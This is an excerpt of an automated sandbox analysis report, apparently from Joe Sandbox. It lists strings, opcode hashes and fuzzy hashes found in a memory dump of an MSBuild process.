                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .5|q$$dq$$dq$$dq$$dq$$dq$$dq
                                                                  • API String ID: 0-3447281907
                                                                  • Opcode ID: 9dfbd2cd429c1d0f0f30c33360c87aae61c4d57422d9df3aea37c35ebf52e80a
                                                                  • Instruction ID: 3aad3f68894a8c0e3f2811ac349decf1f273f1690ba83e4ef304a48449fe7cf2
                                                                  • Opcode Fuzzy Hash: 9dfbd2cd429c1d0f0f30c33360c87aae61c4d57422d9df3aea37c35ebf52e80a
                                                                  • Instruction Fuzzy Hash: FAF12D70B00309CFDB55EFA9D594A6EB7B2BF84301F248568D4069F399DB35AC82DB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq$$dq$$dq$$dq
                                                                  • API String ID: 0-185584874
                                                                  • Opcode ID: 47092cb434d7f54b3072049c8b68f963a903533314bd6e9cfb419921bdea4629
                                                                  • Instruction ID: ad29369db4df1439b207ec0637af0f1b1bce58fe656a3e6c06ffa1dba79a2e50
                                                                  • Opcode Fuzzy Hash: 47092cb434d7f54b3072049c8b68f963a903533314bd6e9cfb419921bdea4629
                                                                  • Instruction Fuzzy Hash: 28B10930A112198FDBA4EB68D5946AEB7A2AF84301F24C569D4069B395DB75D882CB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LRdq$LRdq$$dq$$dq
                                                                  • API String ID: 0-340319088
                                                                  • Opcode ID: 98f9cf61b8f7c2837274b94291495f02a9f6140aab42df42541690f2bd812f1d
                                                                  • Instruction ID: 2f128f524464c6bf8b408044cb2d8e6f6e762693e0eb9c35f235f81450d17e41
                                                                  • Opcode Fuzzy Hash: 98f9cf61b8f7c2837274b94291495f02a9f6140aab42df42541690f2bd812f1d
                                                                  • Instruction Fuzzy Hash: 86518330B012159FDB98EB28D991A6AB7E2FF85310F14C5A9E4059F3A9DB31EC41CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq$$dq$$dq$$dq
                                                                  • API String ID: 0-185584874
                                                                  • Opcode ID: 6e69e802f947dc91f59b4613e184dfd94d49c5798952a9e1468236f95ec88458
                                                                  • Instruction ID: bc38ce5b60462ba0ae37281e443c35afc43018b5fe476b4d814e5f1d243980c1
                                                                  • Opcode Fuzzy Hash: 6e69e802f947dc91f59b4613e184dfd94d49c5798952a9e1468236f95ec88458
                                                                  • Instruction Fuzzy Hash: 3F517E30A122059FCF65DB68D8806AEBBB6EF84311F208979E806EF255DB31DD41CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%